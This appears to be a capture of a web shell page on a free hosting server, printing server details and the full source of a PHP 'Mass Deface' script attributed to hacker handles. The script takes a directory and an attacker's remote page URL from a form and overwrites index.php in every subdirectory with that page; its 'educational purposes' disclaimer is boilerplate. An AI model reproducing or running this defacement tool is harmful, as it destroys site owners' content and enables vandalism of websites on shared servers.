Na FreeHostingu Endora běží desítky tisíc webů. Přidejte se ještě dnes!

Vytvořit web zdarma

Na FreeHostingu Endora běží desítky tisíc webů. Přidejte se ještě dnes!

Vytvořit web zdarma
HEX
Server: Apache
System: Linux c-php74.dw305.endora.cz 6.8.0-85-generic #85-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 18 15:26:59 UTC 2025 x86_64
User: plechovablecha.funsite.cz (767062)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,passthru
Upload Files
File: /home/html/plechovablecha.funsite.cz/public_html/mass.php
<link rel="SHORTCUT ICON" href="http://imageshack.us/a/img716/272/philippineflagsourcec0d.gif" type="image">
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<link href='http://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet' type='text/css'>
<style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), url(http://cur.cursors-4u.net/cursors/cur-9/cur862.png), progress !important;}</style>
<title>Mass Deface Priv8</title>
<center><img src="http://oi44.tinypic.com/k2my3b.jpg height=" width="320"></center>
<center><font color="white" face="Orbitron"><b>Mass Defacement</td></b></center>
<?php
/*
Script: Mass Deface Script
Email: HaCKeR188@gmail.com
Disclaimer:
This script is for Research/Educational/Academic purposes only, 
The Author of this script takes no responsibility for the way
you use this script, you are responsible for your own actions.
*/
echo "<center><textarea rows='10' cols='100'>";
$defaceurl = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."\n";
 
if (is_dir($dir)) {
    if ($dh = opendir($dir)) {
        while (($file = readdir($dh)) !== false) {
                        if(filetype($dir.$file)=="dir"){
                                $newfile=$dir.$file."/index.php";
                                echo $newfile."\n";
                                if (!copy($defaceurl, $newfile)) {
                                        echo "failed to copy $file...\n";
                                }
                        }
        }
        closedir($dh);
    }
}
echo "</textarea></center>";
?>
<font color="white">
<body bgcolor="#000000">
<font face="Iceland">
<br>
<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
[+] Main Directory: <input type='text' style='width: 250px' value='<?php  echo getcwd() . "/"; ?>' name='massdefacedir'>
<br><br>
[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
<br>
<br>
<input type='submit' name='execmassdeface' value='Execute'></form></td>
 
 

<br><br><br>
<font size="5">
** Main Directory = The Directory you want to mass deface (Must have read/write permission) **<br>
** Defacement Url = URL of your deface page (e.g: http://yoursite.com/deface.html ) **<br><br>
<font face="Iceland"><b>Edit by ~xAnon</b>
</body></html>

<center>
<?php
// get an IP address
$ip = $_SERVER['REMOTE_ADDR'];
// display it back
echo "Your IP : " . $ip;
?>
<font> | </font>
<?php
// get an IP address
$server = $_SERVER['SERVER_ADDR'];
echo "Server IP : " . $server;
?>
<br><br>

<a href="https://Facebook.com/AnonTeamX.gov">Anonymous TeaM X</a>
</font size="5">
</center>